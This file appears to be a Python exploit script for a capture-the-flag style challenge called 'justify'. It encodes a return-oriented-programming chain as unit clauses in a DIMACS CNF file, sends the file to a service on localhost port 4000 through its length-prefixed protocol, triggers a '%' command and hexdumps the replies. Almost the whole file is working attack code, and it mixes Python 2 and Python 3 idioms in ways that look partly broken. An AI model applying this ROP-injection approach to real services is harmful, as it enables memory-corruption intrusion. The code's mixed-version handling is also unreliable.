



# justify demo exploit

import socket
import struct
from hexdump import hexdump

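# the data in the protocol
rop = [0x11223344, 0xAABBCCDD]   # 32-bit words, each emitted below as 32 unit clauses (LSB first)
var_count = 512 + len(rop) * 32  # declared variable count == highest variable number used below
clause_count = 0                 # bumped by push(); equals len(pcnf) when dat is built
pcnf = []                        # DIMACS unit clauses, one per entry: "<var> 0" or "-<var> 0"


def push(x):
  """Append a unit clause fixing the next variable: negated literal for '0', plain for any other char.

  Advances the module-level counter ``cnum`` before building the clause, so the
  clause names ``cnum + 1`` relative to the value before the call, and bumps
  ``clause_count`` so the CNF header stays in sync with ``pcnf``.
  """
  global cnum, clause_count
  cnum += 1  # variables are 1 indexed
  pcnf.append(('-' if x == '0' else '') + str(cnum) + " 0")
  clause_count += 1


# Plain loops rather than map(push, ...): map() is lazy on Python 3, so the
# side effects would silently never run and the CNF would contain no clauses.
cnum = 320
for bit in "0" * 32:      # variables 321..352 forced to 0
  push(bit)

cnum = 512                # rop bits occupy variables 513..var_count
for r in rop:
  # bin() drops leading zeros, hence the reversal (LSB first) and right padding to 32 chars.
  # Assumes 0 <= r < 2**32; a wider value would emit extra clauses past var_count -- TODO confirm.
  for bit in bin(r)[2:][::-1].ljust(32, '0'):
    push(bit)

dat = "p cnf %d %d\n" % (var_count, clause_count) + '\n'.join(pcnf)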

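# send the data and call %
def q(x):
  """Pack *x* as an unsigned 32-bit int in native byte order and size (no '<'/'>' prefix).

  The server's expected byte order is not visible here -- TODO confirm it matches native.
  """
  return struct.pack("I", x)


s = socket.create_connection(("127.0.0.1", 4000))


def _status(payload):
  """Send one message with sendall() and print the single status byte the server answers with.

  Raises RuntimeError when the peer closes the connection instead of replying; the
  previous ord(s.recv(1)) form surfaced that as a confusing TypeError on ord('').
  """
  s.sendall(payload)  # send() may deliver only part of a multi-KB payload such as dat
  reply = s.recv(1)
  if not reply:
    raise RuntimeError("connection closed before a status byte was received")
  print(ord(reply)),  # parenthesised form parses on Python 3; trailing comma keeps Python 2's no-newline output


try:
  _status(" ")                      # first message; server answers one status byte
  _status("#" + q(len(dat)))        # '#' carries the length of the payload that follows
  _status("$" + dat)                # '$' carries the CNF text itself
  s.sendall("%")                    # '%' command: replies are read as raw blobs, not a status byte
  for _ in range(3):
    hexdump(s.recv(8192))           # recv() may return fewer than 8192 bytes per call
finally:
  s.close()                         # the original never closed the socket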

